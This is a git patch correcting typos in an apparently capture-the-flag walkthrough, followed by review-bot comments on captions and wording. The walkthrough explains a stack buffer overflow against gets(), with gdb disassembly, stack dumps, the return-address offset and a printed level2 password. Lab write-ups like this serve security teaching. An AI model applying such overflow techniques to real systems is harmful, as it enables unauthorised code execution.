From 8327c2060363002b8029c93fc357023391b123e0 Mon Sep 17 00:00:00 2001 From: gbrochar Date: Mon, 19 May 2025 17:14:08 +0200 Subject: [PATCH] fix: level1 walkthrough typos --- level1/Ressources/{walktrough.md => walkthrough.md} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename level1/Ressources/{walktrough.md => walkthrough.md} (91%) diff --git a/level1/Ressources/walktrough.md b/level1/Ressources/walkthrough.md similarity index 91% rename from level1/Ressources/walktrough.md rename to level1/Ressources/walkthrough.md index 1326a00..4f88824 100644 --- a/level1/Ressources/walktrough.md +++ b/level1/Ressources/walkthrough.md @@ -1,6 +1,6 @@ Code has 2 functions which are interesting, main and run. We need to execute run, for this we are going to use a buffer overflow attack. -For this we've got to input more than the 64 bits allocated for gets command. +For this we've got to input more than the 64 bytes allocated for gets command. We are going to override the stack so the ret command jump to run function. ``` @@ -32,8 +32,7 @@ We are going to override the stack so the ret command jump to run function. 0x0804847e : leave 0x0804847f : ret ``` - -Fig 1. Disassembly of main and run functions +*Fig 1. Disassembly of main and run functions* The first step is to find where the ret address is stored, for this, we will stop the program just before it begins running main and check esp register's @@ -51,6 +50,7 @@ Breakpoint 1, 0x08048480 in main () $1 = (void *) 0xbffff73c (gdb) ``` +*Fig 2. getting the ret address' position on the stack* Now we need to go to the gets and input 64 random characters and try to see them on the stack 
@@ -75,6 +75,7 @@ Breakpoint 1, 0x08048495 in main () 0xbffff750: 0x00 0x00 0x00 0x00 0x1c 0xf7 0xff 0xbf 0xbffff758: 0xdc 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00 ``` +*Fig 3. Examining the stack after inputing 64 'A's* We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. That means we still need to put more 'A's, 12 precisely, then the address we want @@ -89,5 +90,6 @@ level2 cat /home/user/level2/.pass 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77 ``` +*Fig 4. Successfully opening a shell as level2* :)
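Review bot: in the `@@ -1,6 +1,6 @@` hunk the unit change from `64 bits` to `64 bytes` is the right fix and matches the rest of the walkthrough (64 'A's, then 12 more before the return address at 0xbffff73c), but the sentence it sits in still misattributes the allocation: `gets` does not allocate anything, the 64-byte buffer is allocated in main's frame and merely passed to `gets`. Suggest `For this we've got to input more than the 64 bytes allocated for the buffer that gets writes into.` The next line (kept as context) also reads `so the ret command jump to run function`; since this commit is a typo pass, `so the ret instruction jumps to the run function` would fit here. Separately, the rename fixes `walktrough.md` but leaves the `Ressources` directory with its double s; if that spelling is a project-wide convention keep it, otherwise it belongs in the same rename.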
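Review bot: in the `@@ -32,8 +32,7 @@` hunk dropping the blank line between the closing fence and the `*Fig 1. ...*` caption is safe in Markdown, because the closing fence already terminates the code block, and the italic caption style matches the captions introduced in the later hunks, so no change needed; just make sure every caption keeps the same `*Fig N. Capitalized description*` shape, which the Fig 2 caption below currently does not.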
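Review bot: in the `@@ -51,6 +50,7 @@` hunk the new caption `*Fig 2. getting the ret address' position on the stack*` starts lowercase while Fig 1, 3 and 4 are capitalized; use `*Fig 2. Getting the ret address' position on the stack*` for consistency.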
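Review bot: in the `@@ -75,6 +75,7 @@` hunk the new caption `*Fig 3. Examining the stack after inputing 64 'A's*` introduces a fresh typo in a typo-fix commit: `inputing` should be `inputting`.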